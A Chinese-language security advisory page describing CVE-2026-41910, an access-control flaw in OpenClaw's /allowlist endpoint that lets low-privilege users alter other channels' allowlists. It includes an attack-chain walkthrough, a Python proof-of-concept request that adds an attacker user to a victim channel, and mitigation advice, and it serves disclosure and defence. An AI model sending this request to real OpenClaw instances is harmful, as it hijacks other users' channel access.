IPBUF安全漏洞报告
English
CVE-2026-41910 CVSS 4.3 中危

CVE-2026-41910 OpenClaw跨频道允许列表修改漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-41910
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限绕过OpenClaw访问控制失效CVE-2026-41910

漏洞概述

OpenClaw在2026.4.8之前的版本中存在访问控制失效漏洞。由于/allowlist端点未强制执行仅所有者可写的限制,已授权的非所有者用户可以绕过安全检查,跨频道修改其他频道的允许列表,从而破坏系统的信任模型。

技术细节

该漏洞的根本原因是服务器端对/allowlist端点的请求处理逻辑存在缺陷。系统在进行允许列表写入操作时,仅验证了请求者是否持有有效的认证凭证(低权限用户即可满足),但未验证请求者是否为目标频道的所有者。攻击者首先需要注册或获取一个普通用户账户。随后,通过抓包或脚本构造向/allowlist接口发送的HTTP请求,在请求体中指定受害者频道的ID及希望修改的允许列表内容。由于系统缺失了“Channel ID Ownership”的校验环节,攻击者可以成功执行跨频道的写入操作。这属于典型的水平权限越权(IDOR)漏洞,利用过程无需用户交互,且攻击复杂度低。

攻击链分析

STEP 1
1. 信息收集与认证
攻击者获取OpenClaw平台的普通用户访问权限(低权限账户)。
STEP 2
2. 识别目标
攻击者确定想要攻击的目标频道ID(非自己拥有的频道)。
STEP 3
3. 构造恶意请求
攻击者构造针对/allowlist端点的HTTP请求,将目标频道ID填入参数,并附带修改允许列表的操作指令。
STEP 4
4. 执行越权修改
服务器接收请求,由于缺少所有权校验,执行修改操作,完成跨频道的允许列表篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration target_host = "http://vulnerable-openclaw-instance" allowlist_endpoint = "/allowlist" attacker_auth_token = "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Target Channel ID (owned by victim) victim_channel_id = "ch_987654321" # Headers headers = { "Authorization": attacker_auth_token, "Content-Type": "application/json" } # Malicious payload to modify allowlist of victim's channel payload = { "channel_id": victim_channel_id, "action": "add_user", "user_id": "attacker_controlled_user_id" } try: # Send exploit request response = requests.post(f"{target_host}{allowlist_endpoint}", json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Allowlist modified for channel:", victim_channel_id) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.4.8

防御指南

临时缓解措施
如果无法立即升级,建议暂时限制对/allowlist端点的网络访问,或通过WAF等安全设备拦截包含非本人频道ID的修改请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表